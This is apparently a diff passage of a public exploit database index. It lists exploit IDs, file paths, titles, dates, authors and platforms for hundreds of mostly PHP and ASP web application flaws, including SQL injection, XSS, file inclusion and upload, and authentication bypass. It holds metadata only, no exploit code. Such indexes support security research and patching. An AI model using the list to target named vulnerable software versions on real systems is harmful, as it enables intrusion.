-26231,exploits/php/webapps/26231.txt,"PBLang 4.65 Bulletin Board System - 'SetCookie.php' Directory Traversal",2005-09-07,rgod,php,webapps, -26232,exploits/php/webapps/26232.txt,"phpCommunityCalendar 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-07,rgod,php,webapps, -26234,exploits/php/webapps/26234.txt,"Stylemotion WEB//NEWS 1.4 - 'startup.php' Cookie SQL Injection",2005-09-08,onkel_fisch,php,webapps, -26235,exploits/php/webapps/26235.txt,"Stylemotion WEB//NEWS 1.4 - 'news.php' Multiple SQL Injections",2005-09-08,onkel_fisch,php,webapps, -26236,exploits/php/webapps/26236.txt,"Stylemotion WEB//NEWS 1.4 - 'print.php?id' SQL Injection",2005-09-08,onkel_fisch,php,webapps, -26237,exploits/php/webapps/26237.txt,"AMember Pro 2.3.4 - Remote File Inclusion",2005-09-08,"NewAngels Team",php,webapps, -26240,exploits/php/webapps/26240.txt,"WordPress Plugin Ultimate WordPress Auction Plugin 1.0 - Cross-Site Request Forgery",2013-06-17,expl0i13r,php,webapps, -26241,exploits/php/webapps/26241.txt,"Fly-High CMS 2012-07-08 - Unrestricted Arbitrary File Upload",2013-06-17,"CWH Underground",php,webapps, -26243,exploits/php/webapps/26243.txt,"Havalite CMS 1.1.7 - Unrestricted Arbitrary File Upload",2013-06-17,"CWH Underground",php,webapps, -26244,exploits/php/webapps/26244.txt,"SPBAS Business Automation Software 2012 - Multiple Vulnerabilities",2013-06-17,"Christy Philip Mathew",php,webapps, -26246,exploits/php/webapps/26246.txt,"Simple File Manager 024 - Authentication Bypass",2013-06-17,Chako,php,webapps, -26247,exploits/php/webapps/26247.txt,"MyBulletinBoard (MyBB) 1.0 - 'RateThread.php' SQL Injection",2005-09-09,stranger-killer,php,webapps, -40300,exploits/php/webapps/40300.py,"HelpDeskZ 1.0.2 - Unauthenticated Arbitrary File Upload",2016-08-29,"Lars Morgenroth",php,webapps,80 -26252,exploits/php/webapps/26252.txt,"Subscribe Me Pro 2.44 - S.pl Directory Traversal",2005-09-13,h4cky0u,php,webapps, -26253,exploits/php/webapps/26253.txt,"Land Down Under 800/801 - 'auth.php?m' SQL Injection",2005-09-13,"GroundZero Security Research",php,webapps, -26254,exploits/php/webapps/26254.txt,"Land Down Under 800/801 - 'plug.php?e' SQL Injection",2005-09-13,"GroundZero Security Research",php,webapps, -26255,exploits/php/webapps/26255.php,"Mail-it Now! Upload2Server 1.5 - Arbitrary File Upload",2005-09-13,rgod,php,webapps, -26256,exploits/cgi/webapps/26256.txt,"MIVA Merchant 5 - Merchant.MVC Cross-Site Scripting",2005-09-14,admin@hyperconx.com,cgi,webapps, -26257,exploits/php/webapps/26257.txt,"ATutor 1.5.1 - 'password_reminder.php' SQL Injection",2005-09-14,rgod,php,webapps, -26258,exploits/php/webapps/26258.txt,"ATutor 1.5.1 - Chat Logs Remote Information Disclosure",2005-09-14,rgod,php,webapps, -26259,exploits/php/webapps/26259.txt,"Noah's Classifieds 1.2/1.3 - 'index.php' SQL Injection",2005-09-14,trueend5,php,webapps, -26260,exploits/php/webapps/26260.txt,"TWiki TWikiUsers - Arbitrary Command Execution",2005-09-14,B4dP4nd4,php,webapps, -26261,exploits/php/webapps/26261.txt,"Noah's Classifieds 1.3 - 'index.php' Cross-Site Scripting",2005-09-14,trueend5,php,webapps, -26262,exploits/php/webapps/26262.txt,"Digital Scribe 1.4 - Login SQL Injection",2005-09-15,rgod,php,webapps, -26263,exploits/php/webapps/26263.txt,"AEwebworks aeDating 3.2/4.0 - 'search_result.php' SQL Injection",2005-09-15,alexsrb,php,webapps, -26264,exploits/php/webapps/26264.txt,"DeluxeBB 1.0 - 'topic.php' SQL Injection",2005-09-15,abducter,php,webapps, -26265,exploits/php/webapps/26265.txt,"DeluxeBB 1.0 - 'misc.php' SQL Injection",2005-09-15,abducter,php,webapps, -26266,exploits/php/webapps/26266.txt,"DeluxeBB 1.0 - 'forums.php' SQL Injection",2005-09-15,abducter,php,webapps, -26267,exploits/php/webapps/26267.txt,"DeluxeBB 1.0 - 'pm.php' SQL Injection",2005-09-15,abducter,php,webapps, -26268,exploits/php/webapps/26268.txt,"DeluxeBB 1.0 - 'newpost.php' SQL Injection",2005-09-15,abducter,php,webapps, -26333,exploits/asp/webapps/26333.html,"Aenovo - '/Password/default.asp?Password' SQL Injection",2005-10-07,"farhad koosha",asp,webapps, -26334,exploits/asp/webapps/26334.txt,"Aenovo - '/incs/searchdisplay.asp?strSQL' SQL Injection",2005-10-07,"farhad koosha",asp,webapps, -26270,exploits/php/webapps/26270.txt,"Content2Web 1.0.1 - Multiple Input Validation Vulnerabilities",2005-09-16,"Security Tester",php,webapps, -26272,exploits/php/webapps/26272.txt,"EPay Pro 2.0 - 'index.php' Directory Traversal",2005-09-19,h4cky0u,php,webapps, -26273,exploits/php/webapps/26273.txt,"vBulletin 1.0.1 lite/2.x/3.0 - 'joinrequests.php?request' SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps, -26274,exploits/php/webapps/26274.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/user.php' Multiple SQL Injections",2005-09-19,deluxe@security-project.org,php,webapps, -26275,exploits/php/webapps/26275.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertitle.php?usertitleid' SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps, -26276,exploits/php/webapps/26276.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertools.php?ids' SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps, -26277,exploits/php/webapps/26277.txt,"NooToplist 1.0 - 'index.php' Multiple SQL Injections",2005-09-19,"David Sopas Ferreira",php,webapps, -26278,exploits/php/webapps/26278.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/css.php?group' Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps, -26279,exploits/php/webapps/26279.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-09-19,deluxe@security-project.org,php,webapps, -26280,exploits/php/webapps/26280.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/user.php?email' Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps, -26281,exploits/php/webapps/26281.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/language.php?goto' Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps, -26282,exploits/php/webapps/26282.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/modlog.php?orderby' Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps, -26283,exploits/php/webapps/26283.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/template.php' Multiple Cross-Site Scripting Vulnerabilities",2005-09-19,deluxe@security-project.org,php,webapps, -26284,exploits/php/webapps/26284.txt,"MX Shop 3.2 - 'index.php' Multiple SQL Injections",2005-09-19,"David Sopas Ferreira",php,webapps, -26285,exploits/php/webapps/26285.txt,"Hesk 0.92/0.93 - Session ID Authentication Bypass",2005-09-20,"Rajesh Sethumadhavan",php,webapps, -26286,exploits/php/webapps/26286.txt,"PHP Advanced Transfer Manager 1.30 - Multiple Directory Traversal Vulnerabilities",2005-09-20,rgod,php,webapps, -26287,exploits/php/webapps/26287.txt,"PHP Advanced Transfer Manager 1.30 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-20,rgod,php,webapps, -26300,exploits/php/webapps/26300.txt,"LucidCMS 2.0 - 'index.php' Cross-Site Scripting",2005-09-27,X1ngBox,php,webapps, -26302,exploits/php/webapps/26302.txt,"TWiki TWikiUsers - INCLUDE Function Arbitrary Command Execution",2005-09-28,JChristophFuchs,php,webapps, -26303,exploits/php/webapps/26303.txt,"CubeCart 3.0.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-09-28,Lostmon,php,webapps, -26304,exploits/php/webapps/26304.txt,"CubeCart 3.0.3 - 'cart.php?redir' Cross-Site Scripting",2005-09-28,Lostmon,php,webapps, -26305,exploits/php/webapps/26305.txt,"SquirrelMail 1.4.2 Address Add Plugin - 'add.php' Cross-Site Scripting",2005-09-29,anonymous,php,webapps, -26307,exploits/php/webapps/26307.txt,"LucidCMS 2.0 - Login SQL Injection",2005-09-29,rgod,php,webapps, -26308,exploits/php/webapps/26308.txt,"IceWarp Web Mail 5.5.1 - 'blank.html?id' Cross-Site Scripting",2005-09-30,ss_contacts,php,webapps, -26309,exploits/php/webapps/26309.txt,"IceWarp Web Mail 5.5.1 - 'calendar_d.html?createdataCX' Cross-Site Scripting",2005-09-30,ss_contacts,php,webapps, -26310,exploits/php/webapps/26310.txt,"IceWarp Web Mail 5.5.1 - 'calendar_m.html?createdataCX' Cross-Site Scripting",2005-09-30,ss_contacts,php,webapps, -26311,exploits/php/webapps/26311.txt,"IceWarp Web Mail 5.5.1 - 'calendar_w.html?createdataCX' Cross-Site Scripting",2005-09-30,ss_contacts,php,webapps, -26312,exploits/php/webapps/26312.txt,"EasyGuppy 4.5.4/4.5.5 - 'Printfaq.php' Directory Traversal",2005-09-30,"Josh Zlatin-Amishav",php,webapps, -26313,exploits/php/webapps/26313.txt,"Merak Mail Server 8.2.4 r - Arbitrary File Deletion",2005-09-30,ShineShadow,php,webapps, -26386,exploits/php/webapps/26386.txt,"Nuked-klaN 1.7 Forum Module - Multiple SQL Injections",2005-10-24,papipsycho,php,webapps, -26387,exploits/php/webapps/26387.txt,"Nuked-klaN 1.7 Sections Module - 'artid' SQL Injection",2005-10-24,papipsycho,php,webapps, -26316,exploits/php/webapps/26316.php,"imacs CMS 0.3.0 - Unrestricted Arbitrary File Upload",2013-06-19,"CWH Underground",php,webapps, -26319,exploits/php/webapps/26319.txt,"Monkey CMS - Multiple Vulnerabilities",2013-06-19,"Yashar shahinzadeh_ Mormoroth",php,webapps, -26328,exploits/php/webapps/26328.txt,"Utopia News Pro 1.1.3 - 'footer.php' Multiple Cross-Site Scripting Vulnerabilities",2005-10-07,rgod,php,webapps, -26324,exploits/php/webapps/26324.txt,"TellMe 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-05,"Donnie Werner",php,webapps, -26335,exploits/asp/webapps/26335.txt,"Aenovo - Multiple Cross-Site Scripting Vulnerabilities",2005-10-07,"farhad koosha",asp,webapps, -26337,exploits/php/webapps/26337.php,"Cyphor 0.19 - 'lostpwd.php?nick' SQL Injection",2005-10-08,rgod,php,webapps, -26338,exploits/php/webapps/26338.txt,"Cyphor 0.19 - 'newmsg.php?fid' SQL Injection",2005-10-08,retrogod@aliceposta.it,php,webapps, -26339,exploits/php/webapps/26339.txt,"Cyphor 0.19 - 'footer.php?t_login' Cross-Site Scripting",2005-10-08,retrogod@aliceposta.it,php,webapps, -26343,exploits/php/webapps/26343.txt,"Accelerated E Solutions - SQL Injection",2005-10-11,"Andysheh Soltani",php,webapps, -26344,exploits/cgi/webapps/26344.txt,"WebGUI 6.x - Arbitrary Command Execution",2005-10-12,"David Maciejak",cgi,webapps, -26345,exploits/php/webapps/26345.txt,"YaPiG 0.95b - 'view.php?img_size' Cross-Site Scripting",2005-10-13,enji@infosys.tuwien.ac.at,php,webapps, -26346,exploits/php/webapps/26346.txt,"Accelerated Mortgage Manager - 'Password' SQL Injection",2005-10-13,imready4chillin,php,webapps, -26347,exploits/php/webapps/26347.txt,"Gallery 2.0 - 'main.php' Directory Traversal",2005-10-14,"Michael Dipper",php,webapps, -26348,exploits/php/webapps/26348.txt,"Complete PHP Counter - SQL Injection",2005-10-14,BiPi_HaCk,php,webapps, -26349,exploits/php/webapps/26349.txt,"Complete PHP - Counter Cross-Site Scripting",2005-10-14,BiPi_HaCk,php,webapps, -26350,exploits/php/webapps/26350.txt,"PunBB 1.2.x - 'search.php' SQL Injection",2005-10-15,Devil_box,php,webapps, -26351,exploits/asp/webapps/26351.txt,"Comersus Backoffice Plus - Multiple Cross-Site Scripting Vulnerabilities",2005-10-17,Lostmon,asp,webapps, -26354,exploits/jsp/webapps/26354.txt,"NetFlow Analyzer 4 - Cross-Site Scripting",2005-10-18,why@nsfocus.com,jsp,webapps, -26355,exploits/php/webapps/26355.txt,"MySource 2.14 - 'upgrade_in_progress_backend.php?target_url' Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps, -26356,exploits/php/webapps/26356.txt,"MySource 2.14 - 'insert_table.php?bgcolor' Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps, -26357,exploits/php/webapps/26357.txt,"MySource 2.14 - 'edit_table_cell_props.php?bgcolor' Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps, -26358,exploits/php/webapps/26358.txt,"MySource 2.14 - 'header.php?bgcolor' Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps, -26359,exploits/php/webapps/26359.txt,"MySource 2.14 - 'edit_table_row_props.php?bgcolor' Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps, -26360,exploits/php/webapps/26360.txt,"MySource 2.14 - 'edit_table_props.php?bgcolor' Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps, -26361,exploits/php/webapps/26361.txt,"MySource 2.14 - 'edit_table_cell_type_wysiwyg.php?Stylesheet' Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps, -26362,exploits/php/webapps/26362.txt,"MySource 2.14 - 'new_upgrade_functions.php' Multiple Remote File Inclusions",2005-10-18,"Secunia Research",php,webapps, -26363,exploits/php/webapps/26363.txt,"MySource 2.14 - 'init_mysource.php?INCLUDE_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps, -26364,exploits/php/webapps/26364.txt,"MySource 2.14 - 'Socket.php?PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps, -26365,exploits/php/webapps/26365.txt,"MySource 2.14 - 'Request.php?PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps, -26366,exploits/php/webapps/26366.txt,"GLPI 0.83.8 - Multiple Vulnerabilities",2013-06-21,LiquidWorm,php,webapps, -26369,exploits/php/webapps/26369.txt,"MySource 2.14 - 'mail.php?PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps, -26370,exploits/php/webapps/26370.txt,"MySource 2.14 - 'Date.php?PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps, -26371,exploits/php/webapps/26371.txt,"MySource 2.14 - 'Span.php?PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps, -26372,exploits/php/webapps/26372.txt,"MySource 2.14 - 'mimeDecode.php?PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps, -26373,exploits/php/webapps/26373.txt,"MySource 2.14 - 'mime.php?PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps, -26377,exploits/php/webapps/26377.txt,"PHP-Nuke Search Module - 'modules.php' Directory Traversal",2005-10-19,sp3x@securityreason.com,php,webapps, -26378,exploits/php/webapps/26378.txt,"Chipmunk Forum - 'newtopic.php?forumID' Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps, -26379,exploits/php/webapps/26379.txt,"Chipmunk Forum - 'quote.php?forumID' Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps, -26380,exploits/php/webapps/26380.txt,"Chipmunk Forum - 'recommend.php?ID' Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps, -26381,exploits/php/webapps/26381.txt,"Chipmunk Directory - 'recommend.php?entryID' Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps, -26383,exploits/php/webapps/26383.txt,"Zomplog 3.3/3.4 - 'detail.php' HTML Injection",2005-10-22,sikikmail,php,webapps, -26384,exploits/php/webapps/26384.txt,"FlatNuke 2.5.x - 'index.php' Multiple Remote File Inclusions",2005-10-22,abducter_minds@yahoo.com,php,webapps, -26385,exploits/php/webapps/26385.txt,"FlatNuke 2.5.x - 'index.php' Cross-Site Scripting",2005-10-26,alex@aleksanet.com,php,webapps, -26388,exploits/php/webapps/26388.txt,"Nuked-klaN 1.7 Download Module - 'dl_id' SQL Injection",2005-10-24,papipsycho,php,webapps, -26389,exploits/php/webapps/26389.pl,"Nuked-klaN 1.7 Links Module - 'link_id' SQL Injection",2005-10-24,papipsycho,php,webapps, -26390,exploits/php/webapps/26390.txt,"saPHP Lesson - 'add.php?forumid' SQL Injection",2005-10-26,almaster,php,webapps, -26391,exploits/php/webapps/26391.html,"SiteTurn Domain Manager Pro - Admin Panel Cross-Site Scripting",2005-10-24,"farhad koosha",php,webapps, -26392,exploits/php/webapps/26392.txt,"phpMyAdmin 2.x - 'queryframe.php' Cross-Site Scripting",2005-05-20,"Tobias Klein",php,webapps, -26393,exploits/php/webapps/26393.txt,"phpMyAdmin 2.x - 'server_databases.php' Cross-Site Scripting",2005-05-20,"Tobias Klein",php,webapps, -26394,exploits/php/webapps/26394.txt,"MWChat 6.8 - 'chat.php' SQL Injection",2005-05-21,rgod,php,webapps, -26395,exploits/php/webapps/26395.txt,"Basic Analysis and Security Engine (BASE) 1.2 - 'Base_qry_main.php' SQL Injection",2005-10-25,"Remco Verhoef",php,webapps, -26396,exploits/php/webapps/26396.pl,"MyBulletinBoard (MyBB) 1.0 - 'usercp.php' SQL Injection",2005-10-26,Animal,php,webapps, -26397,exploits/php/webapps/26397.txt,"IPBProArcade 2.5.2 - 'GameID' SQL Injection",2005-10-26,almaster,php,webapps, -26398,exploits/cgi/webapps/26398.txt,"RSA ACE Agent 5.x - Image Cross-Site Scripting",2005-10-26,"Bernhard Mueller",cgi,webapps, -26399,exploits/php/webapps/26399.txt,"Belchior Foundry VCard 2.9 - Remote File Inclusion",2005-10-26,X,php,webapps, -26400,exploits/php/webapps/26400.txt,"Flyspray 0.9 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-26,Lostmon,php,webapps, -26401,exploits/hardware/webapps/26401.txt,"TRENDnet TE100-P1U Print Server Firmware 4.11 - Authentication Bypass",2013-06-24,Chako,hardware,webapps, -26405,exploits/php/webapps/26405.txt,"Top Games Script 1.2 - 'play.php?gid' SQL Injection",2013-06-24,AtT4CKxT3rR0r1ST,php,webapps, -26406,exploits/php/webapps/26406.txt,"Alienvault Open Source SIEM (OSSIM) 4.1 - Multiple SQL Injection Vulnerabilities",2013-06-24,"Glafkos Charalambous",php,webapps, -27541,exploits/php/webapps/27541.txt,"DbbS 2.0 - 'Topics.php' SQL Injection",2006-03-31,DaBDouB-MoSiKaR,php,webapps, -27542,exploits/php/webapps/27542.txt,"SoftBiz Image Gallery - 'mage_desc.php' Multiple SQL Injections",2006-03-31,Linux_Drox,php,webapps, -27543,exploits/php/webapps/27543.txt,"SoftBiz Image Gallery - 'template.php?provided' SQL Injection",2006-03-31,Linux_Drox,php,webapps, -26408,exploits/php/webapps/26408.txt,"phpEventCalendar 0.2.3 - Multiple Vulnerabilities",2013-06-24,AtT4CKxT3rR0r1ST,php,webapps, -26410,exploits/php/webapps/26410.py,"Collabtive 1.0 - 'manageuser.php' SQL Injection",2013-06-24,drone,php,webapps, -26414,exploits/php/webapps/26414.txt,"PodHawk 1.85 - Arbitrary File Upload",2013-06-24,"CWH Underground",php,webapps, -26415,exploits/hardware/webapps/26415.txt,"Linksys X3000 1.0.03 build 001 - Multiple Vulnerabilities",2013-06-24,m-1-k-3,hardware,webapps, -26416,exploits/php/webapps/26416.txt,"Elemata CMS RC3.0 - 'global.php?id' SQL Injection",2013-06-24,"CWH Underground",php,webapps, -26827,exploits/php/webapps/26827.txt,"QuickPayPro 3.1 - 'popups.edit.php?popupid' SQL Injection",2005-12-14,r0t,php,webapps, -26423,exploits/php/webapps/26423.txt,"Mantis 0.19.2/1.0 - 'Bug_sponsorship_list_view_inc.php' File Inclusion",2005-10-26,"Andreas Sandblad",php,webapps, -26425,exploits/php/webapps/26425.pl,"Woltlab 1.1/2.x - 'Info-DB Info_db.php' Multiple SQL Injections",2005-10-26,admin@batznet.com,php,webapps, -26426,exploits/asp/webapps/26426.html,"Techno Dreams (Multiple Scripts) - Multiple SQL Injections",2005-10-26,"farhad koosha",asp,webapps, -26427,exploits/php/webapps/26427.txt,"GCards 1.43 - 'news.php' SQL Injection",2005-10-26,svsecurity,php,webapps, -26428,exploits/php/webapps/26428.html,"PHP-Nuke Search Enhanced Module 1.1/2.0 - HTML Injection",2005-10-26,bhfh01,php,webapps, -26429,exploits/asp/webapps/26429.txt,"Novell ZENworks Patch Management 6.0.52 - '/computers/default.asp?Direction' SQL Injection",2005-10-27,"Dennis Rand",asp,webapps, -26430,exploits/asp/webapps/26430.txt,"Novell ZENworks Patch Management 6.0.52 - '/reports/default.asp' Multiple SQL Injections",2005-10-27,"Dennis Rand",asp,webapps, -26431,exploits/php/webapps/26431.txt,"ATutor 1.x - 'forum.inc.php' Arbitrary Command Execution",2005-10-27,"Andreas Sandblad",php,webapps, -26432,exploits/php/webapps/26432.txt,"ATutor 1.x - 'body_header.inc.php?section' Local File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps, -26433,exploits/php/webapps/26433.txt,"ATutor 1.x - 'print.php?section' Remote File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps, -26434,exploits/php/webapps/26434.txt,"PBLang 4.65 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-27,abducter,php,webapps, -26435,exploits/asp/webapps/26435.txt,"ASP Fast Forum - 'error.asp' Cross-Site Scripting",2005-10-27,syst3m_f4ult,asp,webapps, -26436,exploits/php/webapps/26436.txt,"MG2 0.5.1 - Authentication Bypass",2005-10-29,"Preben Nylokken",php,webapps, -26437,exploits/php/webapps/26437.txt,"PHP Advanced Transfer Manager 1.30 - Remote Unauthorized Access",2005-10-29,Zeelock,php,webapps, -26438,exploits/php/webapps/26438.txt,"Invision Gallery 2.0.3 - 'index.php' SQL Injection",2005-10-31,almaster,php,webapps, -26439,exploits/asp/webapps/26439.txt,"Snitz Forum 2000 - 'post.asp' Cross-Site Scripting",2005-10-31,h4xorcrew,asp,webapps, -26440,exploits/php/webapps/26440.txt,"PHPCafe Tutorial Manager - 'index.php' SQL Injection",2005-10-31,almaster,php,webapps, -26441,exploits/php/webapps/26441.txt,"OaBoard 1.0 - 'forum.php' Multiple SQL Injections",2005-10-31,abducter_minds@yahoo.com,php,webapps, -26442,exploits/php/webapps/26442.txt,"PHP 4.x - PHPInfo Cross-Site Scripting",2005-10-31,"Stefan Esser",php,webapps, -26444,exploits/asp/webapps/26444.txt,"Comersus Backoffice 4.x/5.0/6.0 - 'comersus_Backoffice_supportError.asp?error' Cross-Site Scripting",2005-10-31,_6mO_HaCk,asp,webapps, -26445,exploits/asp/webapps/26445.pl,"Comersus Backoffice 4.x/5.0/6.0 - '/comersus/database/comersus.mdb' Direct Request Database Disclosure",2005-10-31,_6mO_HaCk,asp,webapps, -26446,exploits/php/webapps/26446.txt,"Belchior Foundry vCard Pro 3.1 - 'Addrbook.php' SQL Injection",2005-11-01,almaster,php,webapps, -26447,exploits/php/webapps/26447.html,"Elite Forum 1.0 - HTML Injection",2005-11-01,gladiator,php,webapps, -26449,exploits/php/webapps/26449.txt,"e107 Advanced Medal System Plugin - SQL Injection",2013-06-26,"Life Wasted",php,webapps, -26453,exploits/php/webapps/26453.py,"PHP-Charts 1.0 - 'index.php?type' Remote Code Execution",2013-06-26,infodox,php,webapps, -26455,exploits/php/webapps/26455.txt,"VUBB - 'index.php' Cross-Site Scripting",2005-11-01,"Alireza Hassani",php,webapps, -26456,exploits/php/webapps/26456.txt,"XMB Forum 1.9.3 - 'post.php' SQL Injection",2005-11-01,almaster,php,webapps, -26458,exploits/php/webapps/26458.txt,"News2Net 3.0 - 'index.php' SQL Injection",2005-11-02,Mousehack,php,webapps, -26459,exploits/php/webapps/26459.txt,"PHPWebThings 0.4.4 - 'forum.php' Cross-Site Scripting",2005-11-02,Linux_Drox,php,webapps, -26461,exploits/cgi/webapps/26461.txt,"Simple PHP Blog 0.4 - 'preview_cgi.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-02,enji@infosys.tuwien.ac.at,cgi,webapps, -26462,exploits/cgi/webapps/26462.txt,"Simple PHP Blog 0.4 - 'preview_static_cgi.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-02,enji@infosys.tuwien.ac.at,cgi,webapps, -26463,exploits/cgi/webapps/26463.txt,"Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-02,enji@infosys.tuwien.ac.at,cgi,webapps, -26465,exploits/php/webapps/26465.txt,"CuteNews 1.4.1 - 'show_archives.php' Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,php,webapps, -26466,exploits/php/webapps/26466.txt,"CuteNews 1.4.1 - 'template' Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,php,webapps, -26467,exploits/php/webapps/26467.txt,"PHP Handicapper - 'Process_signup.php' HTTP Response Splitting",2005-11-03,BiPi_HaCk,php,webapps, -26468,exploits/php/webapps/26468.pl,"Galerie 2.4 - 'showgallery.php' SQL Injection",2005-11-03,abducter_minds@yahoo.com,php,webapps, -26469,exploits/php/webapps/26469.txt,"JPortal Web Portal 2.2.1/2.3.1 - 'comment.php' SQL Injection",2005-11-04,Mousehack,php,webapps, -26470,exploits/php/webapps/26470.txt,"JPortal Web Portal 2.2.1/2.3.1 - 'news.php' SQL Injection",2005-11-04,Mousehack,php,webapps, -26473,exploits/asp/webapps/26473.txt,"Ocean12 ASP Calendar Manager 1.0 - Authentication Bypass",2005-11-04,syst3m_f4ult,asp,webapps, -26474,exploits/php/webapps/26474.txt,"PHPFM - Arbitrary File Upload",2005-11-07,rUnViRuS,php,webapps, -26475,exploits/cgi/webapps/26475.txt,"Asterisk 0.x/1.0/1.2 Voicemail - Unauthorized Access",2005-11-07,"Adam Pointon",cgi,webapps, -26476,exploits/php/webapps/26476.txt,"OSTE 1.0 - Remote File Inclusion",2005-11-07,khc@bsdmail.org,php,webapps, -26477,exploits/php/webapps/26477.txt,"XMB Forum 1.9.3 - 'u2u.php' Cross-Site Scripting",2005-11-07,"HACKERS PAL",php,webapps, -26478,exploits/php/webapps/26478.txt,"Invision Power Services Invision Board 2.1 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-07,benjilenoob,php,webapps, -26480,exploits/php/webapps/26480.txt,"ToendaCMS 0.6.1 - 'admin.php' Directory Traversal",2005-11-07,"Bernhard Mueller",php,webapps, -26481,exploits/php/webapps/26481.txt,"PHPList Mailing List Manager 2.x - '/admin/admin.php?id' SQL Injection",2005-11-07,"Tobias Klein",php,webapps, -26482,exploits/php/webapps/26482.txt,"PHPList Mailing List Manager 2.x - '/admin/editattributes.php?id' SQL Injection",2005-11-07,"Tobias Klein",php,webapps, -26483,exploits/php/webapps/26483.txt,"PHPList Mailing List Manager 2.x - '/admin/eventlog.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-07,"Tobias Klein",php,webapps, -26484,exploits/php/webapps/26484.txt,"PHPList Mailing List Manager 2.x - '/admin/configure.php?id' Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps, -26485,exploits/php/webapps/26485.txt,"PHPList Mailing List Manager 2.x - '/admin/users.php?find' Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps, -26486,exploits/php/webapps/26486.txt,"SAP Web Application Server 6.x/7.0 - Error Page Cross-Site Scripting",2005-11-09,"Leandro Meiners",php,webapps, -26487,exploits/php/webapps/26487.txt,"SAP Web Application Server 6.x/7.0 - 'frameset.htm?sap-syscmd' Cross-Site Scripting",2005-11-09,"Leandro Meiners",php,webapps, -26488,exploits/php/webapps/26488.txt,"SAP Web Application Server 6.x/7.0 - Open Redirection",2005-11-09,"Leandro Meiners",php,webapps, -26490,exploits/php/webapps/26490.txt,"TikiWiki 1.9 - 'Tiki-view_forum_thread.php' Cross-Site Scripting",2005-11-09,"Moritz Naumann",php,webapps, -26496,exploits/hardware/webapps/26496.txt,"eFile Wifi Transfer Manager 1.0 - Multiple Vulnerabilities",2013-06-30,Vulnerability-Lab,hardware,webapps,8080 -26499,exploits/php/webapps/26499.txt,"PHPSysInfo 2.x - Multiple Input Validation Vulnerabilities",2005-11-11,anonymous,php,webapps, -26500,exploits/php/webapps/26500.txt,"PHPWebThings 1.4 - 'download.php?File' SQL Injection",2005-11-12,A.1.M,php,webapps, -26501,exploits/php/webapps/26501.txt,"ActiveCampaign 1-2-All Broadcast Email 4.0 - Admin Control Panel 'Username' SQL Injection",2005-11-12,bhs_team,php,webapps, -26502,exploits/php/webapps/26502.txt,"Help Center Live 1.0/1.2/2.0 - 'module.php' Local File Inclusion",2005-11-14,"HACKERS PAL",php,webapps, -26503,exploits/php/webapps/26503.txt,"Wizz Forum - 'ForumAuthDetails.php?AuthID' SQL Injection",2005-11-14,"HACKERS PAL",php,webapps, -26504,exploits/php/webapps/26504.txt,"Wizz Forum - 'forumreply.php?TopicID' SQL Injection",2005-11-14,"HACKERS PAL",php,webapps, -26505,exploits/php/webapps/26505.txt,"Codegrrl - 'Protection.php' Code Execution",2005-11-14,"Robin Verton",php,webapps, -26506,exploits/cgi/webapps/26506.txt,"Walla TeleSite 3.0 - 'ts.exe?tsurl' Arbitrary Article Access",2005-11-15,"Rafi Nahum",cgi,webapps, -26507,exploits/cgi/webapps/26507.txt,"Walla TeleSite 3.0 - 'ts.exe?sug' Cross-Site Scripting",2005-11-15,"Rafi Nahum",cgi,webapps, -26508,exploits/cgi/webapps/26508.txt,"Walla TeleSite 3.0 - 'ts.exe?sug' SQL Injection",2005-11-15,"Rafi Nahum",cgi,webapps, -26509,exploits/cgi/webapps/26509.txt,"Walla TeleSite 3.0 - 'ts.cgi' File Existence 